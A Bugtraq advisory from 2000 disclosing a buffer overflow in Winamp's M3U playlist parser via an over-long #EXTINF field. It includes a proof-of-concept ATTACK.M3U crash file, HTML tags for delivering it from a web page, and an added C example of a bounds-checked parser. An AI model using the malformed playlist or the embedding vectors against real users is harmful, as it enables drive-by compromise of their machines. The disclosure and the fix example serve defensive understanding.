[15878] in bugtraq
Winamp M3U playlist parser buffer overflow security vulnerability
daemon@ATHENA.MIT.EDU (Pauli Ojanpera)
Thu Jul 20 18:17:36 2000
Message-Id: <LAW-F83FV4TJvGa1hXE000013d0@hotmail.com>
Date: Thu, 20 Jul 2000 19:52:56 EEST
Reply-To: Pauli Ojanpera <pauli_ojanpera@HOTMAIL.COM>
From: Pauli Ojanpera <pauli_ojanpera@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
LEGAL NOTICE:
By reading this you do agree that life does not make
sense and it doesn't need to. You also agree to
wear a condom. You do agree to think about nature.
.. umm you also agree to GPL all software you've ever
written.
[Click here if you're under 18]
There is a buffer overflow security vulnerability in Winamp's (http://www.winamp.com) M3U playlist parser. The overflow happens when an M3U extension called "#EXTINF:" is being handled: the size of the parameter following that keyword is not checked.
Real world example:
--cut-here-and-paste-to-a-file-with-m3u-extension--
#EXTM3U
#EXTINF:AAAAAAAAA....AAAAAAAAA<cr><lf>
--cut here--
There should be at least 280 A's.
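As an added example (it is not part of the original post and not Winamp's code), here is the check the advisory says is missing: a small C `#EXTINF` parser that copies the field into a fixed-size buffer only after verifying it fits, and refuses the line otherwise. The 256-byte buffer size, the `#EXTINF:<seconds>,<title>` layout, the function names and the sample playlist (including the over-long line built from 300 'A's) are all assumptions constructed for this example.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed fixed buffer size for the #EXTINF field; the same shape of buffer a
 * native player would keep, which is exactly where an unchecked copy overflows. */
#define EXTINF_TITLE_MAX 256

struct extinf {
    long seconds;                 /* -1 when the line carries no duration */
    char title[EXTINF_TITLE_MAX];
};

/* Parse one "#EXTINF:" line into *out.
 * Returns 0 on success, -1 when the line is not an #EXTINF line or when the
 * field would not fit in the buffer. Nothing is written to *out on failure. */
int parse_extinf(const char *line, struct extinf *out)
{
    static const char prefix[] = "#EXTINF:";
    const size_t plen = sizeof(prefix) - 1;
    if (line == NULL || out == NULL) return -1;
    if (strncmp(line, prefix, plen) != 0) return -1;

    const char *p = line + plen;
    char *end = NULL;
    const char *title;
    errno = 0;
    long secs = strtol(p, &end, 10);
    if (end != p && errno == 0 && *end == ',') {
        title = end + 1;          /* "#EXTINF:<seconds>,<title>" */
    } else {
        secs = -1;                /* no usable duration: treat the whole field as the title */
        title = p;
    }

    /* Length of the field up to the end of the line (CR/LF are not copied). */
    size_t tlen = strcspn(title, "\r\n");
    if (tlen >= EXTINF_TITLE_MAX) return -1;   /* the missing check: refuse, never copy */

    out->seconds = secs;
    memcpy(out->title, title, tlen);
    out->title[tlen] = '\0';
    return 0;
}

/* Walk a playlist held in memory; count #EXTINF lines that parse cleanly and,
 * via *rejected, the ones refused by the length or format check. */
int scan_playlist(const char *text, int *rejected)
{
    int entries = 0, bad = 0;
    struct extinf info;
    const char *line = text;
    while (*line) {
        if (strncmp(line, "#EXTINF:", 8) == 0) {
            if (parse_extinf(line, &info) == 0) entries++; else bad++;
        }
        const char *nl = strchr(line, '\n');
        if (nl == NULL) break;
        line = nl + 1;
    }
    if (rejected) *rejected = bad;
    return entries;
}

/* Constructed sample: one well-formed entry followed by an over-long #EXTINF
 * line (300 'A's, as in the advisory's description of the trigger). */
int demo_counts(int *rejected)
{
    char longline[320];
    char playlist[640];
    memset(longline, 'A', 300);
    longline[300] = '\0';
    snprintf(playlist, sizeof playlist,
             "#EXTM3U\n#EXTINF:213,Some Artist - Some Song\nsong.mp3\n#EXTINF:%s\nother.mp3\n",
             longline);
    return scan_playlist(playlist, rejected);
}

int main(void)
{
    int bad = 0;
    int ok = demo_counts(&bad);
    printf("accepted %d entry, rejected %d over-long #EXTINF line(s)\n", ok, bad);
    return 0;
}
```

The parser rejects rather than truncates: a silently shortened title is harmless here, but refusing keeps the failure visible to the caller and avoids any off-by-one around the terminator. The decisive line is the `tlen >= EXTINF_TITLE_MAX` comparison before `memcpy`; without it the copy runs past the structure, which is the class of bug the advisory reports.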
The overflow allows total control over one's computer.
For example, one could embed an M3U file in a web page in
several ways:
- <A HREF="ATTACK.M3U">
- <BGSOUND SRC="ATTACK.M3U">
- <EMBED SRC="ATTACK.M3U">
I have tested the first one, but I have Media Player installed on this computer and my browser uses its components for the latter two, so I cannot confirm those.
The only problem is some structure (FILE *?) after
the buffer because it has a zero in it and it must
not be crafted to successfully return from the function.
I had to apply some trial and error to get code executed.
Currently the code crafts Winamp's MOD file format support
until restarted (I presume so.. :-).
The attached .M3U file should crash Winamp at 0000:41414141. I've tested it with Windows 98 and Windows 95 with Winamp versions 2.62 and 2.64.
Thank you.. I might not be available too frequently
to answer your mail.. Have a nice life. Bye.
[Attachment: ATTACK.M3U]
#EXTM3U
#EXTINF:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA !PPPPAAAA